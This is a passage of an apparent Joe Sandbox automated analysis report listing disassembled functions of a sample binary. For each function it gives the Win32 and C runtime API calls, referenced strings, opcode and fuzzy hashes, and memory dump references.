                                                                                                • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                                                Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __getptd_noexit.LIBCMT ref: 00415150
                                                                                                  • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                                                  • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                                                  • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                                                  • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                                                  • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                                                                • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                                                • __freeptd.LIBCMT ref: 0041516B
                                                                                                • ExitThread.KERNEL32 ref: 00415173
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                                                • String ID:
                                                                                                • API String ID: 1454798553-0
                                                                                                • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                                • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                                                • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                                • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                                                Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _strncmp
                                                                                                • String ID: Q\E
                                                                                                • API String ID: 909875538-2189900498
                                                                                                • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                                • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                                                • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                                • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                                                Function 0044F4C1 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 288COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: U$\
                                                                                                • API String ID: 4104443479-100911408
                                                                                                • Opcode ID: 835b85672203460d32fbae7ee09f86de6f9ff03da8fa91cdddc3cb8863709e71
                                                                                                • Instruction ID: 856fd8c118fd9d88a35ce60e305a75550171e0483a96a15f1a05c3eab080688b
                                                                                                • Opcode Fuzzy Hash: 835b85672203460d32fbae7ee09f86de6f9ff03da8fa91cdddc3cb8863709e71
                                                                                                • Instruction Fuzzy Hash: D2C1B070E002499FEF14CF69C4907AEFBF2AF85304F2881AED451A7341D739A946CB55
                                                                                                Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                  • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                                                  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                  • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                                                • String ID: AutoIt3GUI$Container
                                                                                                • API String ID: 2652923123-3941886329
                                                                                                • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                                                • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                                                • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                                                • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                                                Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove_strncmp
                                                                                                • String ID: U$\
                                                                                                • API String ID: 2666721431-100911408
                                                                                                • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                                • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                                                • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                                • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                                                Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                • __wcsnicmp.LIBCMT ref: 00467288
                                                                                                • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                                • String ID: LPT
                                                                                                • API String ID: 3035604524-1350329615
                                                                                                • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                                                • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                                                • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                                                • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                                                Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: \$h
                                                                                                • API String ID: 4104443479-677774858
                                                                                                • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                                • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                                                                • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                                • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                                                                Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memcmp
                                                                                                • String ID: &
                                                                                                • API String ID: 2931989736-1010288
                                                                                                • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                                                • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                                                Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: \
                                                                                                • API String ID: 4104443479-2967466578
                                                                                                • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                                                • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                                                Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _wcslen.LIBCMT ref: 00466825
                                                                                                • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CrackInternet_wcslen
                                                                                                • String ID: |
                                                                                                • API String ID: 596671847-2343686810
                                                                                                • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                                                • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                                                Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID: '
                                                                                                • API String ID: 3850602802-1997036262
                                                                                                • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                                                • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                                                Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _strlen.LIBCMT ref: 0040F858
                                                                                                  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                                                  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                                                • _sprintf.LIBCMT ref: 0040F9AE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove$_sprintf_strlen
                                                                                                • String ID: %02X
                                                                                                • API String ID: 1921645428-436463671
                                                                                                • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                                                • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                                                Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID: Combobox
                                                                                                • API String ID: 3850602802-2096851135
                                                                                                • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                                                • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                                                Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: LengthMessageSendTextWindow
                                                                                                • String ID: edit
                                                                                                • API String ID: 2978978980-2167791130
                                                                                                • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                                                • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                                                Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                                                                Download Yara Rule
